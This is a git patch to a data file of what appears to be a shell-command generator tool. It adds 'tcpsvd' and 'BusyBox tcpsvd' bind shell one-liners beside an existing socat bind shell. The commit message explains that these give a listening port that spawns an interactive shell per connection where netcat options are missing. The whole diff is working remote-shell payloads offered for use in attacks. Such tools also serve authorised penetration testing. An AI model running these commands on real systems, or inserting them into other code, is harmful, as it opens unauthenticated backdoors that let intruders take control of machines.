From ec94fdec12c671fb9689fb078f7fe13a48b1717f Mon Sep 17 00:00:00 2001 From: Safa Safari Date: Fri, 24 Apr 2026 17:39:07 +0330 Subject: [PATCH] add tcpsvd bind shell variants Adds tcpsvd and BusyBox tcpsvd entries to the bind shell list so environments that lack nc -e / ncat still have a one-liner that listens and spawns an interactive shell per connection. --- js/data.js | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/js/data.js b/js/data.js index 8900989..5b164ad 100644 --- a/js/data.js +++ b/js/data.js @@ -449,6 +449,16 @@ const bindShellCommands = withCommandType( "name": "Socat (TTY) Bind", "command": "socat TCP-LISTEN:{port},reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane", "meta": ["bind", "mac", "linux"] + }, + { + "name": "tcpsvd Bind", + "command": "tcpsvd -vE 0.0.0.0 {port} {shell} -i", + "meta": ["bind", "linux"] + }, + { + "name": "BusyBox tcpsvd Bind", + "command": "busybox tcpsvd -vE 0.0.0.0 {port} {shell} -i", + "meta": ["bind", "linux"] } ] );